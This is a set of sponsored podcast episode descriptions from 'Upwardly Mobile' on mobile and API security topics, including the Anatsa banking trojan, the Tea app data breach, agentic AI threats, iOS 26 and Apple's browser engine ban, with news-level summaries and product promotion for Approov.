    In this episode of "Upwardly Mobile," we dive deep into the alarming evolution of Anatsa, a potent Android banking trojan that has significantly expanded its reach, now setting its sights on over 830 financial applications worldwide. First identified in 2020, Anatsa (also known as Teabot or Troddler) grants its operators full control over infected devices, enabling them to perform fraudulent transactions and steal critical bank information, cryptocurrencies, and various other data on behalf of victims.

    What You'll Learn in This Episode:
    • Anatsa's Expanded Targets: Discover how the Anatsa banking trojan has broadened its scope to include more than 150 new banking and cryptocurrency applications, extending its malicious campaigns to mobile users in new countries like Germany and South Korea.
    • Deceptive Distribution Methods: Understand the cunning ways Anatsa spreads, primarily through decoy applications found on the official Google Play Store. These seemingly harmless apps often masquerade as useful tools like PDF viewers, QR code scanners, or phone cleaners, accumulating over 50,000 downloads in some cases. Once installed, they silently fetch a malicious payload disguised as an update from Anatsa's command-and-control (C&C) server.
    • Advanced Evasion Techniques: Learn about Anatsa's sophisticated anti-analysis and anti-detection mechanisms, designed to evade security measures. These include decrypting strings at runtime using dynamically generated Data Encryption Standard (DES) keys, performing emulation and device model checks, and periodically altering package names and installation hashes. The malware even hides its DEX payload within corrupted archives that bypass standard static analysis tools.
    • How Anatsa Compromises Devices: Find out how Anatsa requests and automatically enables critical accessibility permissions upon installation. This allows it to display overlays on top of legitimate applications, tamper with notifications, receive and read SMS messages, and ultimately present fake banking login pages to steal credentials. The trojan also incorporates keylogging capabilities.
    • Industry Response: Hear about the efforts of cybersecurity firms like Zscaler, which identified and reported 77 nefarious applications distributing Anatsa and other malware families, collectively accounting for over 19 million downloads. While Google has since removed these reported applications and states that Google Play Protect offers automatic protection, the continuous evolution of Anatsa highlights the ongoing threat.

    Protect Yourself: Cybersecurity experts advise Android users to always verify the permissions that applications request and ensure they align with the intended functionality of the app.

    Relevant Links to Source Materials:
    • Source 1: SecurityWeek Article on Anatsa: "Anatsa Android Banking Trojan Now Targeting 830 Financial Apps"
    • Source 2: Zscaler ThreatLabz Report: "Anatsa's Latest Updates | ThreatLabz"
    • Source 3: BSI Report on Anatsa: "BSI - Anatsa / Teabot"

    Sponsor: This episode of "Upwardly Mobile" is brought to you by Approov Mobile Security. Learn more about securing your mobile applications at approov.io.

    Keywords: Anatsa, Android banking trojan, mobile security, cybersecurity, financial apps, Google Play, malware, credential theft, keylogging, fraudulent transactions, Zscaler, threat intelligence, Android malware, cryptocurrency, mobile banking, data protection, Teabot, Troddler, anti-analysis, C&C server.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast
    This episode includes AI-generated content.

  39. 84

    Apple's iOS Obfuscation Dilemma: App Store Rejection & Developer Security Challenges

    In this vital episode of "Upwardly Mobile," we dive deep into the complexities of mobile app security within the healthcare sector, particularly concerning the HIPAA Security Rule and the challenges of iOS code obfuscation and App Store review. As telemedicine and mobile access to ePHI (Electronic Protected Health Information) become ubiquitous, understanding and implementing robust security measures is no longer optional—it's imperative.

    What You'll Learn in This Episode:
    • The Evolving Threat Landscape for Healthcare Apps: Discover how the rapid adoption of mobile healthcare apps by both patients and practitioners has created new, data-rich attack surfaces for hackers. This includes apps used for consultations, prescription refills, appointment scheduling, accessing test results, and even those associated with medical devices.
    • Limitations of Traditional Security: We explore why traditional security approaches and even robust TLS (Transport Layer Security) are often insufficient for protecting mobile healthcare apps and their APIs, particularly due to the unique exposure of mobile app code and device environments. Xcode's native build settings like symbol stripping and dead code stripping are primarily for optimization and offer no meaningful protection against determined reverse-engineering efforts.
    • Proposed Improvements to the HIPAA Security Rule: Learn about Approov's specific recommendations to strengthen the updated HIPAA Security Rule (initially proposed in June 2024), focusing on mobile apps accessing ePHI. Key proposed changes include mandating:
        ◦ App Attestation: A proven technique to ensure only genuine, unmodified apps can access APIs.
        ◦ Runtime Device Attestation: Continuous scanning and real-time reporting of device environments to block requests from compromised devices.
        ◦ Dynamic Certificate Pinning: Essential for protecting communication channels from Man-in-the-Middle (MitM) attacks, even when traffic is encrypted.
        ◦ API Secret Protection: Explicit guidelines to ensure API keys are never stored in mobile app code and are delivered only as needed to verified apps.
        ◦ Runtime Zero Trust Protection of Identity Exploits: Additional controls like app and device attestation to provide an extra layer of zero-trust security against credential stuffing and identity abuse.
        ◦ Breach Readiness and Service Continuity: Extending incident response plans to cover third-party breaches and explicitly managing API keys and certificates during a breach.
    • The Role of OWASP MASVS: Understand how the OWASP Mobile Application Security Verification Standard (MASVS) serves as the industry standard for mobile app security, offering guidelines for developers and testers. We specifically highlight MASVS-RESILIENCE for hardening apps against reverse engineering and tampering.
    • The iOS Obfuscation Dilemma: Unpack the conflict faced by developers in regulated industries like fintech and healthcare: the critical need to protect proprietary algorithms and sensitive logic through code obfuscation versus the risk of rejection by Apple's App Store. Apple's guidelines are ambiguously enforced, often flagging aggressive obfuscation as an attempt to "trick the review process".
    • Third-Party Obfuscation Solutions: Since Xcode provides no built-in true obfuscation features, we discuss the imperative for advanced third-party solutions. Learn about techniques like symbol renaming, string encryption, control flow obfuscation, and dummy code insertion. We also touch upon leading commercial tools like Guardsquare's iXGuard, Zimperium's Mobile Application Protection Suite (MAPS), and Appdome, as well as LLVM-based obfuscators.
    • Obfuscation as a Compliance Control: Discover why code obfuscation and Runtime Application Self-Protection (RASP) are fundamental technical safeguards for HIPAA compliance and meeting the requirements of PCI DSS, even if not explicitly named in the regulations.
    • Strategic Recommendations for Implementation: Get insights on implementing a risk-based tiered approach to app protection, integrating obfuscation into your CI/CD pipeline, and transparently communicating your security posture to the App Store review team to mitigate rejection risks.

    Tune in to gain a comprehensive understanding of securing your mobile health applications in today's complex digital environment!

    Relevant Links & Resources:
    • Sponsor: Learn more about app and API security solutions from Approov: approov.io
    • Approov Blog: Injecting Mobile App Security into The HIPAA Healthcare Security Rule: approov.io/blog/injecting-mobile-app-security-into-the-hipaa-healthcare-security-rule
    • OWASP Mobile Application Security (MAS) Project: owasp.org/www-project-mobile-app-security
    • OWASP Mobile Application Security Verification Standard (MASVS): mas.owasp.org/MASVS/03-Using_the_MASVS/

    Keywords: Mobile App Security, Healthcare, HIPAA, ePHI, API Security, Code Obfuscation, iOS Security, App Store Review, App Attestation, Runtime Application Self-Protection (RASP), PCI DSS, OWASP MASVS, Man-in-the-Middle (MitM) Attacks, API Keys, Zero Trust, Telemedicine, Virtual Healthcare, Mobile Health, Cybersecurity, Enterprise Security, Data Protection, Compliance, InfoSec, Privacy, Digital Health.

    🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | Podcast
    This episode includes AI-generated content.

  40. 83

    AI vs AI | Agentic AI Security: Top Threats & Best Practices for Apps and APIs

    Securing the Autonomous Frontier: Defending Apps and APIs from Agentic AI Threats

    Episode Notes

    In this episode of Upwardly Mobile, we delve into the critical and rapidly evolving landscape of Agentic AI security. As artificial intelligence advances beyond reactive responses to become autonomous systems capable of planning, reasoning, and taking action without constant human intervention, the need for robust security measures has become paramount. These intelligent software systems perceive their environment, reason, make decisions, and act to achieve specific objectives autonomously, often leveraging large language models (LLMs) for their core reasoning engines and control flow.

    The Rise of Agentic AI and Magnified Risks
    Agentic AI is rapidly integrating into various applications across diverse industries, from healthcare and finance to manufacturing. However, this increased autonomy magnifies existing AI risks and introduces entirely new vulnerabilities. As highlighted by the OWASP Agentic Security Initiative, AI isn't just accelerating product development; it's also automating attacks and exploiting gaps faster than ever before. LLMs, for instance, can already brute force APIs, simulate human behavior, and bypass rate limits without triggering flags.

    Key security challenges with Agentic AI include:
    - Poorly designed reward systems, which can lead AI to exploit loopholes and achieve goals in unintended ways.
    - Self-reinforcing behaviors, where AI escalates actions by optimizing too aggressively for specific metrics without adequate safeguards.
    - Cascading failures in multi-agent systems, arising from bottlenecks or resource conflicts that propagate across interconnected agents.
    - Increased vulnerability to sophisticated adversarial attacks, including AI-powered credential stuffing bots and app tampering attempts.
    - The necessity for sensitive data access, making robust access management and data protection crucial.

    The OWASP Agentic Security Initiative has identified a comprehensive set of threats unique to these systems, including:
    - Memory Poisoning and Cascading Hallucination Attacks, where malicious or false data corrupts the agent's memory or propagates inaccurate information across systems.
    - Tool Misuse, allowing attackers to manipulate AI agents to abuse their integrated tools, potentially leading to unauthorized data access or system manipulation.
    - Privilege Compromise, exploiting weaknesses in permission management for unauthorized actions or dynamic role inheritance.
    - Intent Breaking & Goal Manipulation, where attackers alter an AI's planning and objectives.
    - Unexpected Remote Code Execution (RCE) and Code Attacks, leveraging AI-generated code environments to inject malicious code.
    - Identity Spoofing & Impersonation, enabling attackers to masquerade as AI agents or human users.
    - Threats specific to multi-agent systems like Agent Communication Poisoning and the presence of Rogue Agents, where malicious agents infiltrate and manipulate distributed AI environments.

    Essential Mitigation Strategies for Agentic AI
    Defending against these advanced threats requires a multi-layered, adaptive security approach. Our sources outline several crucial best practices for both app and API security:

    1. Foundational App Security Best Practices:
    - Continuous Authentication: Move beyond session-based authentication. Implement behavioral baselines, short-lived tokens, session fingerprinting, and re-authentication on state changes to ensure the right user is in control.
    - Detecting AI-Generated Traffic: Employ behavioral anomaly detection, device and environment fingerprinting, adaptive challenge-response mechanisms, and input entropy measurement to identify and block sophisticated AI bots.
    - Secure APIs as Crown Jewels: Implement strict input validation, rate limiting per user/IP/API key, authentication/authorization at every endpoint, request signing, replay protection, and detailed logging.
    - Zero Trust Architecture: Assume no part of your infrastructure is inherently trusted. Enforce identity and access management at every layer, segment networks, use mutual TLS between services, and continuously monitor for unusual access patterns.
    - Harden MFA Workflows: Mitigate MFA fatigue attacks by moving away from push notifications as the primary MFA method, preferring hardware tokens or TOTP, and limiting approval attempts with exponential backoff.
    - LLM-Aware Security Filters: If your app uses LLMs, implement context-aware input sanitization, prompt filtering layers, output monitoring for hallucinations, and rate limit suspicious query patterns.
    - Encrypt and Obfuscate Client-Side Code: Protect intellectual property and reduce attack surface by obfuscating code, encrypting sensitive strings, implementing runtime code splitting, and avoiding embedding secrets in client code.
    - Train Detection Systems with Synthetic Attacks: Use AI-generated synthetic attack simulations to train ML classifiers for anomaly detection, turning AI's offensive power into a defensive advantage.
    - Adopt Secure-by-Design Principles: Integrate security into every phase of the development lifecycle, validating inputs, enforcing least privilege, using static/dynamic code analysis, and automating dependency management.
    - Stay Compliant with Emerging AI Security Standards: Implement transparent logging and audit trails for AI interactions, ensure explainability, follow data minimization principles, and prepare for AI risk management certifications.

    2. API-Specific Defenses for Agentic AI:
    - Design for API Security by Default: Apply secure-by-design principles, enforce HTTPS/TLS 1.3, use least-privilege permissions, and implement strong authentication/authorization with dynamically-scoped tokens.
    - Identify & Monitor AI-Agent Traffic: Include agentic endpoints in API discovery and monitor traffic in real-time using AI-backed analytics to detect anomalous behavior.
    - Context-Aware Guardrails & Threat Modeling: Develop tailored agentic AI threat models like MAESTRO or SHIELD/ATFAA and implement LLM-aware guardrails to enforce boundaries.
    - Authenticate & Audit AI Agent Identities: Treat each agent as a non-human identity, enforce strong credential hygiene, rotate secrets, and audit identity posture.
    - Input/Output Filtering & Prompt Hygiene: Defend against prompt injection through sanitization, prompt separation, and adversarial testing. Enforce data hygiene for agent memory to mitigate poisoning attacks.
    - Continuous Authentication & Rate Limiting: Avoid long-lived sessions with continuous authentication and use strict rate limiting to prevent bots from chaining tasks or overwhelming endpoints.
    - Use Adaptive Security Tools & AI-Based Defense: Deploy API security platforms with real-time anomaly detection and consider a "good-guy" AI to inspect agent intents.
    - Red-Teaming & Continuous Testing: Simulate attacks like memory poisoning, prompt injection, and privilege misuse to uncover vulnerabilities proactively.
    - Training & Governance: Educate teams on agent-specific vulnerabilities and establish agent lifecycle governance with approval flows, isolation environments, and human-in-the-loop checkpoints.

    3.
OWASP's Mitigation Playbooks: The OWASP Agentic Security Initiative provides structured mitigation strategies organized into playbooks, addressing specific threat categories:- Preventing AI Agent Reasoning Manipulation: Focuses on reducing attack surface, implementing agent behavior profiling, preventing goal manipulation, and strengthening decision traceability.- Preventing Memory Poisoning & AI Knowledge Corruption: Involves securing AI memory access, detecting/responding to poisoning, and preventing the spread of false knowledge.- Securing AI Tool Execution & Preventing Unauthorized Actions: Emphasizes restricting AI tool invocation, monitoring/preventing tool misuse, and preventing resource exhaustion.- Strengthening Authentication, Identity & Privilege Controls: Covers secure AI authentication mechanisms, restricting privilege escalation, and detecting/blocking AI impersonation attempts.- Protecting Human-in-the-Loop (HITL) & Preventing Decision Fatigue Exploits: Aims to optimize HITL workflows, identify AI-induced human manipulation, and strengthen AI decision traceability.- Securing Multi-Agent Communication & Trust Mechanisms: Focuses on securing AI-to-AI communication, detecting/blocking rogue agents, and enforcing multi-agent trust and decision security.Companies like https://approov.io/blog/what-you-need-to-know-about-broken-object-level-authorization-bola offer patented mobile app attestation technology that ensures only genuine, unmodified apps running in trusted environments can access backend services and APIs, providing real-time verification, dynamic API shielding, and secure credential management to mitigate AI-driven credential leaks. 
By combining traditional API security fundamentals with agent-specific strategies, mobile developers can transform APIs from vulnerabilities into resilient trust boundaries, capable of resisting threats posed by autonomous, goal-oriented AI agents.Relevant Links:- Rocket Farm Studios: 10 App Security Best Practices for AI Threats - Learn more about securing apps against AI-driven threats: https://www.rocketfarmstudios.com/blog/10-app-security-best-practices-for-ai-threats/- https://genai.owasp.org/resource/agentic-ai-threats-and-mitigations/🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

  41. 82

    From Vibe to Venture: Building and Securing Your Mobile Apps and APIs

    The Future of App Development with Vibe Coding and Approov

Description: In this episode of Upwardly Mobile, we delve into the exciting, fast-paced world of "vibe coding" and rapid app development, where concepts can transform into functional Minimum Viable Products (MVPs) in days, not weeks. We discuss how intuitive, AI-powered platforms like Lovable are enabling developers to build full-stack web applications using plain English, focusing on the "vibe" of the application rather than getting bogged down in traditional coding complexities.

However, this speed comes with significant security risks. We explore the critical case of the Tea dating app data breach: a women-only dating advice app suffered an extensive hack exposing users' direct messages and photos, including an additional 59,000 images and DMs. Experts like Ted Miracco, CEO at mobile security maker Approov, emphasized that Tea lacked adequate security protections and "rushed to market," exposing consumers. The breach highlighted a systemic problem: the real attack surface for mobile apps often lies in their backend APIs, which are not inherently secured by app store vetting processes like Apple's or Google's. Attackers were able to reverse-engineer the mobile client and access sensitive data through an insecure, unauthenticated API.

So, how can you build fast without sacrificing security? We introduce Approov, a security solution designed to ensure that only genuine instances of your app, running on safe devices, can access your APIs. Approov protects against various threats, including malicious bots, tampered apps, credential stuffing, and API abuse. Key defenses Approov offers include App Attestation, Ephemeral API Keys, Dynamic Certificate Pinning, RASP (Runtime Application Self-Protection), and Real-time Monitoring.

For early-stage startups, Approov has launched a "Founder-Friendly Tier," providing core security features at a price point and scale that makes sense for new ventures, helping to bridge the gap between rapid development and robust security. Making security a priority from day one offers a powerful advantage: it boosts investor confidence, builds user trust, and prevents costly, time-consuming security retrofits down the line. As the sources suggest, "secure APIs are the new uptime," and security should be seen as a differentiator, not a tax.

Key Takeaways:
• Vibe coding and platforms like Lovable enable incredibly fast app development, allowing quick market entry and iteration.
• Rapid development can introduce significant security vulnerabilities, especially at the API level, as demonstrated by the Tea app data breach.
• Approov provides essential mobile and API security solutions, including a new Founder-Friendly Tier, to protect apps from launch through scaling.
• Prioritizing security from the start enhances investor confidence and user trust, proving to be an "unfair advantage" in the competitive app market.

Relevant Links:
• CBS News: Tea dating app disables direct messaging as it investigates data breach: https://www.cbsnews.com/news/tea-dating-app-data-breach-cbs-news/
• VIBE Apps | Fast to Market, Risky to Deploy? The Security Debt in Rapid App Development: https://www.linkedin.com/pulse/vibe-apps-fast-market-risky-deploy-security-debt-rapid-approov-mobile-security
• From Vibe to Venture: A Guide to Building and Securing Your App: https://approov.io/blog/from-vibe-to-venture

Sponsor: This episode is brought to you by Approov Mobile Security. Learn more about securing your mobile app and APIs, including the new Founder-Friendly Tier, at approov.io.

Keywords: vibe coding, app development, mobile security, API security, data breach, Tea app, Lovable, Approov, startup security, founder-friendly tier, fast to market, app launch, investor confidence, user trust, cybersecurity, no-code, low-code, app protection, digital security

This episode includes AI-generated content.

  42. 81

    Japan Says Apple Must Lift Browser Ban | Billions at Stake, and the Fight for the Open Web on iOS

    Apple's Enduring Browser Engine Ban: A Global Standoff for the Open Web

Description: In this episode of Upwardly Mobile, we delve into Apple's persistent ban on third-party browser engines on iOS, a restriction that continues to stifle competition and limit the capabilities of web applications. Despite growing global pressure and explicit legal mandates like the EU's Digital Markets Act (DMA), Apple has maintained technical and contractual barriers that make it commercially unviable for other browser vendors like Google and Mozilla to offer their own engines on iOS. We explore why this ban matters for consumers, developers, and the future of the open internet.

Key Discussion Points:
• The Unique Ban: Apple is the only "gatekeeper" that imposes a ban on third-party browser engines, forcing all browsers on iOS to use its proprietary WebKit engine. This prevents genuine browser competition and limits the functionality and performance of web apps, hindering their ability to compete with native apps.
• Apple's Justifications vs. Reality:
    ◦ Apple claims its restrictions are for security, privacy, and system integrity. Apple's representatives, like Kyle Andeer and Gary Davis, assert that browser vendors have "everything they need" and have simply "chosen not to" port their engines.
    ◦ However, critics argue that Apple uses security and privacy as an "elastic shield" for its financial interests. Evidence does not suggest material differences in security performance between WebKit and alternative engines. Browser vendors, with their strong security track records, could even improve iOS security by competing.
• Barriers to Entry: The primary obstacles preventing alternative browser engines on iOS include:
    ◦ Loss of existing EU users: Browser vendors are forced to create entirely new apps, meaning they must abandon current users and start from scratch in the EU. This single requirement "destroys the business case".
    ◦ No web developer testing outside the EU: Developers globally cannot test their web software on third-party engines on iOS for EU users.
    ◦ Hostile legal terms: Apple's contractual conditions are "harsh, one-sided, and incompatible with the DMA".
    ◦ Uncertainty on updates for travelers: Apple has not confirmed that browser updates (including security patches) will not be disabled if an EU user travels outside the EU for more than 30 days.
• Regulatory Pressure and Compliance:
    ◦ EU Digital Markets Act (DMA): Explicitly prohibits gatekeepers from requiring the use of their web browser engine. The DMA demands "effective compliance" and prohibits undermining obligations through technical or contractual means. Despite 15 months having passed, no browser vendor has successfully ported an engine, indicating Apple's non-compliance.
    ◦ Japan's Smartphone Act (MSCA): Passed and will directly prohibit Apple's ban by December 2025. Guidelines clarify that actions that hinder adoption, not just outright bans, are prohibited. It also mandates fair API access and prompt choice screens at initial smartphone setup.
    ◦ UK Competition and Markets Authority (CMA): Provisionally designated Apple (and Google) with "Strategic Market Status," highlighting Apple's browser engine ban and suppression of web app competition. The UK sees strong enforcement as crucial for economic growth and innovation, especially for startups.
• Why Apple Resists: It's fundamentally about protecting revenue.
    ◦ Google Search Deal: Safari is Apple's "highest margin product," bringing in $20 billion annually from Google for default search engine status. Losing even 1% browser market share means a $200 million annual revenue loss.
    ◦ App Store Revenue: By limiting web app capabilities, Apple protects its App Store revenue, estimated at $27.4 billion in 2024. Web apps could replace most phone apps, and even a 20% shift could mean a $5.5 billion annual loss for Apple.
    ◦ User Lock-in: The ban also contributes to user lock-in, making it harder for consumers to switch devices or operating systems, as seen with iMessage.
• The Path Forward: Regulators and advocates, like Open Web Advocacy, call for firm intervention to compel Apple to make necessary changes. Key fixes include allowing browsers to update existing apps with their own engines, enabling global web developer testing, granting full hardware and content filtering API access, and allowing third-party browsers to manage and install web apps.

Conclusion: The fight for browser competition on iOS is a global issue, not just a regional one. With the EU, Japan, and the UK now directly addressing Apple's ban, 2026 is poised to be a decisive year in restoring browser competition and ensuring the web remains an open, interoperable platform.

Sponsor: This episode is brought to you by Approov, ensuring secure mobile API access for your apps. Learn more at approov.io.

Sources/Further Reading:
• "Apple's Browser Engine Ban Persists, Even Under the DMA" - Open Web Advocacy
• "Japan: Apple Must Lift Browser Engine Ban by December" - Open Web Advocacy
• "UK Regulator Flags Apple's iOS Browser Engine Ban in Draft SMS Designation" - Open Web Advocacy

Keywords: Apple, iOS, Browser Engine Ban, DMA, Digital Markets Act, WebKit, Safari, Open Web Advocacy, Browser Competition, Web Apps, App Store, Google, Mozilla, UK CMA, Japan Smartphone Act, Antitrust, Market Power, Revenue, Gatekeeper, Tech Regulation, Monopoly, Interoperability, Mobile Software Competition Act, SMS.

This episode includes AI-generated content.

  43. 80

    Beyond the Beta: iOS 26 Features, AI, and Next-Gen App Security

    Beyond the Beta: iOS 26 Features, AI, and Next-Gen App Security

This episode of Upwardly Mobile dives deep into Apple's groundbreaking iOS 26 update, exploring its transformative new features, the much-anticipated AI integrations, and crucial security considerations for developers. From the visually stunning Liquid Glass design to advanced app attestation requirements, we cover everything you need to know about Apple's latest mobile operating system.

iOS 26 Key Features & User Experience

iOS 26 marks a significant generational leap for Apple's mobile operating system, moving directly from iOS 18 to align naming with other Apple platforms, and is considered the biggest OS update since iOS 7. It introduces a bold new design and more AI-powered features.

Design & Visuals: Experience Liquid Glass, Apple's new cohesive design language, which visually transforms widgets and the dock for a sleek, immersive interface. You'll also notice improved animations in the Camera and Photos apps, ensuring smoother transitions. For drivers, customizable CarPlay wallpapers automatically adapt to light and dark modes, providing a visually pleasing transition between day and night.

AI-Powered Innovations: Benefit from AI-powered notification summaries that streamline your alerts. Two highly anticipated phone features include Call Screening, which picks up unknown numbers, asks the caller's purpose, and shows a live transcript, allowing you to decide whether to answer. Its companion, Hold Assist, listens to hold music for you and alerts you the instant a real person is available.

Enhanced App Experiences: The Weather app now offers "significant locations" for hyper-localized forecasts based on your frequently visited destinations. The Podcasts app provides custom playback options to fine-tune your listening. Safari now includes haptic feedback for downloads, offering tactile confirmation of completed actions.

User Security & Privacy: A redesigned passcode screen simplifies access, and updated password settings offer greater control over website permissions. The "Reduce Loud Sounds" feature automatically lowers excessive audio levels to protect your hearing. Additionally, App Store age ratings have been revamped with new categories (13+, 16+, and 18+) and enhanced parental controls, ensuring a safer digital environment for younger users.

Getting Your Hands on iOS 26

Anyone with a compatible iPhone can test iOS 26 features ahead of its official release. Apple opened its developer program to everyone for free in 2023, allowing users to load the developer beta right now.

Compatibility: iOS 26 supports iPhone 11 and newer models, including the forthcoming iPhone 17 series. This includes any A13 Bionic handset forward, while the iPhone XR/XS generations are not included.

Apple Intelligence Compatibility: For the headline Apple Intelligence features, you'll specifically need an iPhone 16 model or the iPhone 15 Pro/Pro Max.

Installation Steps: To install, visit the Apple Developer site on the device you plan to update, sign in with your Apple ID, agree to the terms, and enable Developer Mode in Settings > Privacy and Security. Then, navigate to Settings > General > Software Update > Beta Updates and choose the "iOS 26 Developer Beta" option. The download size is approximately 15.28GB.

Important Warning: The iOS 26 developer beta is primarily meant for developers, not for day-to-day use. Early builds often contain bugs that can cause apps to crash, drain your battery, overheat your phone, and generally make your device sluggish. It's generally smarter to stick with the public beta (expected very soon) for your main iPhone unless you need to test software. Always archive a backup of your device before installing any beta software to prevent data loss.

iOS 26 Security: A Developer's Imperative

For apps handling sensitive or high-value data, such as those in fintech, healthcare, or enterprise sectors, iOS 26 strongly signals the need to implement multi-layer security measures beyond Apple's default protections.

Rising API-Level Threats: Most security incidents today are focused on the backend and API, where attackers exploit app behavior to reverse-engineer API calls and then use bots, scripts, or tampered apps to access sensitive data. Crucially, Apple's native device security does not inherently protect APIs.

Beyond Apple's App Attest: While Apple's built-in App Attest API is a helpful tool, it does not work reliably on jailbroken devices, rendering it insufficient on its own for robust security, especially for high-value apps.

The Power of Third-Party App Attestation (Sponsor Highlight): To ensure that API calls originate only from unaltered, legitimate app instances, strong app attestation mechanisms are essential. Third-party attestation solutions, such as Approov, are critical for comprehensive protection. These solutions offer:
• Detection of rooted/jailbroken devices, preventing tokens from being issued to apps on compromised devices.
• Resistance against runtime manipulation tools like Frida or Magisk.
• Dynamic API key delivery and certificate pinning, which avoids embedding static keys in code or resources and enforces strict server identity verification (Mutual TLS).
• Continuous verification of the app environment's integrity during use.

Runtime Application Self-Protection (RASP): With the increasing sophistication of attack tools, iOS apps should actively protect themselves at runtime. RASP capabilities detect and respond to various threats, including runtime manipulation, debugging and hooking attempts, and unauthorized code injection. When debuggers are detected, sessions can be terminated. Sensitive logic and API call structures should also be obfuscated.

Preparing for Sideloading (EU DMA): With legislation like the Digital Markets Act (DMA) forcing Apple to allow more third-party services and sideloading in the EU, app security can no longer rely solely on the App Store's "walled garden". Developers must prepare for multi-channel app distribution by validating app signatures post-distribution and embedding anti-repackaging measures that invalidate modified builds.

Continuous Monitoring & DevSecOps: It is vital to integrate continuous threat monitoring, supporting dynamic policy updates and telemetry-based threat intelligence, ideally with cloud-based control planes. Security should be integrated directly into CI/CD pipelines, scanning every build for secrets and insecure code. Automated tools like the Approov CLI should be utilized for secure app registration and deployment.

Compliance & Privacy: Ensure GDPR/CCPA compliance by not collecting Personally Identifiable Information (PII) via security SDKs, maintaining access logs for tokens and policy changes, and configuring policy-driven access control based on region, device, or user group rules.

Conclusion: iOS 26 sets a new standard for operating systems, offering a blend of innovative features, enhanced security, and expanded content options. For developers building high-value apps, this update serves as a strong cue to double down on multi-layer security strategies that go beyond Apple's default offerings.

Sponsor: This episode is brought to you by Approov. Learn more about securing your mobile APIs and protecting your apps from advanced threats at approov.io.

Keywords: iOS 26, Apple, iPhone, AI features, Liquid Glass, Call Screening, Hold Assist, App Security, API Security, App Attestation, RASP, Runtime Application Self-Protection, Sideloading, Digital Markets Act (DMA), Jailbroken devices, Approov, Mobile Security, Cybersecurity, Fintech apps, Healthcare apps, Enterprise apps, iOS 26 Beta, Developer Tools, Mobile App Development, Threat Detection, Apple Intelligence, OS Update, Tech News.

This episode includes AI-generated content.

  44. 79

    Tea App Breach Exposed 72,000 Selfies & IDs: Urgent Lessons for Mobile API Security

    Mobile-First Security: The Urgent Lessons from the Tea App Breach

In this focused segment of Upwardly Mobile, we unpack the recent Tea app breach, a sobering case study that highlights the critical need for a robust mobile-first cybersecurity strategy and proper API security.

The Tea app, a women's dating safety application that rapidly climbed to the top of the free iOS App Store listings and reached the No. 1 spot on Apple's US App Store, claiming over 1.6 million users, was designed to allow women to exchange information about men to enhance safety. A key feature involved new users verifying their identity by uploading a selfie. The company confirmed a major security breach, stating they had "identified unauthorized access to one of our systems". Preliminary findings revealed access to approximately 72,000 user images. This alarming exposure included:
• 13,000 images of selfies and photo identification documents, such as driver's licenses, which users had submitted during the account verification process.
• 59,000 publicly viewable images from posts, comments, and direct messages within the app.

The exposed images reportedly originated from a "legacy data system" that held information from more than two years prior. Posts on Reddit and 404 Media indicated that these sensitive user images, including faces and IDs, were posted on the anonymous online messageboard 4chan, with one post explicitly stating, "DRIVERS LICENSES AND FACE PICS! GET THE FUCK IN HERE BEFORE THEY SHUT IT DOWN!" and highlighting "No authentication, no nothing. It's a public bucket". Users from 4chan claimed to have discovered an exposed database hosted on Google's mobile app development platform, Firebase, as the source of the vulnerability.

According to Ted Miracco, Chief Executive Officer of Approov Limited, the Tea app breach is a stark example of a "systemic failure in API security". He attributes this failure to several critical oversights:
• Broken access controls (BOLA).
• Weak authentication.
• Missing transport protections.
• Absent runtime safeguards.

Miracco emphasizes that such failures are "not inevitable" but are "preventable with disciplined engineering, proper API defenses, and a real commitment to protecting user trust". This incident highlights a common pitfall where companies "rush apps to market, driven by subscriber growth and churn metrics, while privacy and security are sidelined".

The broader lesson from the Tea app breach underscores how mobile apps introduce significant risk to an organization's back-end services. Mobile apps serve as a "front door to the back end," and a mobile device effectively holds "the secret key to the front door" – the key to server-side APIs. The increasing reliance on numerous server-side APIs accessed via mobile devices creates growing security exposure, especially since many APIs are often not adequately protected. Shockingly, up to half of APIs may lack basic usernames and passwords, and their access keys can be easily stolen from various locations, including mobile device files, server-side files, or even decompiled application source code. Hackers, by gaining control over their own devices, can easily reverse engineer apps and steal crucial API keys, which then allow them to build scripts to attack back-end corporate services undetected. Failing to protect API keys is likened to "putting all your money in a safe place in the home but not locking the front door". This breach serves as a powerful reminder that organizations must prioritize mobile security as a central component of their cybersecurity strategy, rather than an afterthought.

This episode includes AI-generated content.

  45. 78

    Securing the Cloud | Unlocking True Mobile & API Security

    Unlocking True Mobile & API Security in the Cloud Age

Welcome to "Upwardly Mobile", the podcast dedicated to navigating the complex world of mobile and cloud security! In this episode, we dive deep into why mobile app security and API security are not just technical concerns, but fundamental business imperatives for organisations of all types, from agricultural giants like John Deere to popular dating apps such as Hinge. We explore how the traditional reliance on static defences like code obfuscation is no longer sufficient against today's sophisticated, AI-powered threats, and what a truly resilient, Zero Trust-based security strategy looks like.

Why Mobile & API Security Matters to Everyone in Your Organisation: The consequences of neglecting mobile app and API security are severe, ranging from massive data breaches to reputational damage and direct impacts on business operations. Here's why key stakeholders deeply care:
• Operational Leadership & Executives (e.g., C-suite): For companies like John Deere, insecure APIs and mobile apps can lead to attackers accessing, altering, or deleting "sensitive business information related to a farm's operations", resulting in "competitive disadvantage or even sabotage". For dating apps like Hinge, the core business relies on user trust, and API flaws, often exploited via the mobile app, can expose "vast amount of Personally Identifiable Information (PII) for other users", which would be "catastrophic for user acquisition, retention, and the company's survival". The ultimate "consequences of vulnerabilities—such as data breaches affecting billions and leading to hundreds of billions in losses"—fall under their purview.
• Security Teams (e.g., CISO, Security Architects): Their mandate is to implement a "holistic" security approach that "protect[s] the app, its communications, and the API". They understand that "APIs are the true target" for attackers and that "a vulnerable mobile app communicating with a misconfigured cloud backend is a recipe for disaster". They are tasked with implementing a "robust AppSec Strategy" and "strong Cloud Security Posture Management (CSPM)" to prevent "service disruption" and "full system compromise".
• Legal & Compliance Teams: Mobile app and API vulnerabilities, as seen in e-hailing apps, can expose "vast amount of Personally Identifiable Information (PII)". This necessitates their involvement due to potential "severe privacy violations, massive user exodus, and significant legal and regulatory repercussions" associated with data breaches and non-compliance with data protection regulations.
